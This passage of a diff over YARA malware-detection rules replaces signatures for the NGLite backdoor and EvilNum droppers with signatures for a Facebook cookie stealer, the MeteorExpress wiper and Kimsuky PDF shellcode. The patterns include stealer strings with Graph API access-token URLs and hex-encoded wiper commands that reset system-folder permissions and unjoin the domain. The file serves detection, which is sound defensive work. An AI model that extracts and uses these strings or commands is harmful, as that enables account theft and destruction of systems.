+		$seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		uint32( 0 ) == 0x464c457f and filesize > 25KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE
+
+rule ARKBIRD_SOLG_MAL_Stealer_Cookie_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect NGLite backdoor (version B)"
+		description = "Detect strings used by EdgeCookiesView and ChromeCookiesView in the ressources of the Cookie Stealer"
 		author = "Arkbird_SOLG"
-		id = "e18f2891-366b-5cff-a17e-63523bfd9cee"
-		date = "2021-11-08"
-		modified = "2021-11-09"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19"
+		id = "02a68973-73b2-572a-a358-f0edc921773a"
+		date = "2020-07-09"
+		modified = "2020-07-09"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1281154921811841026"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-09/MAL_Stealer_Cookie_July_2020_1.yar#L3-L32"
 		license_url = "N/A"
-		logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296"
+		logic_hash = "63747567a9dd68ac0d16b67910957cb9bc28d7237f431ac0c76403ca810e1b94"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d"
-		hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "47b2b56c961cdc78bf06eed30737232ba99424b51648418bacacd522a12ad339"
 
 	strings:
-		$s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 }
-		$s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 }
-		$s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 }
-		$s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 }
-		$s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 }
+		$x1 = "C:\\Users\\admin1\\AppData\\Local\\Temp\\samplebin.exe" fullword wide
+		$x2 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccount" ascii
+		$x3 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispa" ascii
+		$x4 = "Cookie:" fullword ascii
+		$x5 = "autoLoginCookie name=" fullword ascii
+		$x6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36" fullword wide
+		$s7 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSp" ascii
+		$s8 = "https://www.facebook.com/login/device-based/login/" fullword wide
+		$s9 = "api/?sid=" fullword wide
+		$s10 = "/deleteregkey" fullword ascii
+		$s11 = "Old cookies folder of Edge/IE" fullword ascii
+		$s12 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
+		$s13 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
+		$s14 = "ChromeCookiesView.exe" fullword wide
+		$s15 = "EdgeCookiesView.exe" fullword wide
+		$s16 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s17 = "login/device-based/login" fullword ascii
+		$s18 = "c_user" fullword wide
+		$s19 = "c:\\Projects\\VS2005\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 2600KB and ( pe.imphash ( ) == "89c8a19cc2d9172de5901988530c700d" or ( ( 3 of ( $x* ) ) and ( 8 of ( $s* ) ) ) )
 }
-rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect NGLite backdoor (version A)"
+		description = "Detect MeteorExpress/BreakWin wiper"
 		author = "Arkbird_SOLG"
-		id = "cf2845f3-1176-5197-9d05-f123b0f23c75"
-		date = "2021-11-09"
-		modified = "2021-11-09"
-		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19"
+		id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2"
+		date = "2021-08-06"
+		modified = "2021-08-07"
+		reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a"
+		logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72"
-		hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd"
+		hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b"
+		hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce"
+		hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4"
+		hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473"
 		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 }
-		$s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 }
-		$s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 }
-		$s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 }
-		$s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d }
+		$s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 }
+		$s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d }
+		$s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 }
+		$s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 }
+		$s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b }
+		$s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 }
+		$s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 }
+		$s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 }
+		$s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Evilnum_LNK_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect LNK file used by EvilNum group"
+		description = "Detect Kimsuky shellcode used in fake PDF against South Korea"
 		author = "Arkbird_SOLG"
-		id = "9d570c02-606a-5bff-af7a-9b5ef1e6df90"
-		date = "2020-07-13"
-		modified = "2021-07-14"
+		id = "0b8d514b-82b6-5106-a87a-0890be1850d5"
+		date = "2021-08-03"
+		modified = "2021-08-04"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350"
-		score = 75
+		logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554"
-		hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb"
-		hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3"
+		hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e"
+		hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc"
+		hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e"
+		level = "Experimental"
 		tlp = "white"
-		adversary = "EvilNum"
+		adversary = "Kimsuky"
 
 	strings:
-		$s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide
-		$s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide
-		$s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s4 = "System32 (C:\\Windows)" fullword wide
-		$s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 }
-		$s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d }
-		$s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 }
+		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
+		$s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 }
+		$s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb }
+		$s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f }
+		$s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c }
+		$s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 }
 
 	condition:
-		filesize > 60KB and 6 of ( $s* )
+		uint32( 0 ) == 0x46445025 and filesize > 25KB and $x1 and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Evilnum_JS_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect JS script used by EvilNum group"
+		description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea"
 		author = "Arkbird_SOLG"
-		id = "08b410c4-4899-5280-9735-6b3017c7a813"
-		date = "2020-07-13"
-		modified = "2021-07-14"
+		id = "8df7090a-6583-5d25-92bd-422e6b4191f7"
+		date = "2021-08-03"
+		modified = "2021-08-04"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_JS_Jul_2021_1.yara#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "0ace40e54f6dca078f17e7e157c7973642b83366ba792d2bcdc0d971f729fb68"
-		score = 75
-		quality = 69
+		logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "8420577149bef1eb12387be3ea7c33f70272e457891dfe08fdb015ba7cd92c72"
-		hash2 = "c16824a585c9a77332fc16357b5e00fc110c00535480e9495c627f656bb60f24"
-		hash3 = "1061baf604aaa7ed5ba3026b9367de7b6c7f20e7e706d9e9b5308c45a64b2679"
+		hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021"
+		hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84"
+		level = "Experimental"
 		tlp = "white"
-		adversary = "EvilNum"
+		adversary = "Kimsuky"
 
 	strings:
-		$s1 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
-		$s2 = { 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 6d 6c 32 2e 44 4f 4d 44 6f 63 75 6d 65 6e 74 22 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 42 61 73 65 36 34 44 61 74 61 22 29 3b }
-		$s3 = { 69 66 20 28 2d 31 20 21 3d 20 57 53 63 72 69 70 74 2e 53 63 72 69 70 74 46 75 6c 6c 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 [1-8] 28 22 }
-		$s4 = { 52 75 6e 28 [1-8] 30 2c 20 30 29 }
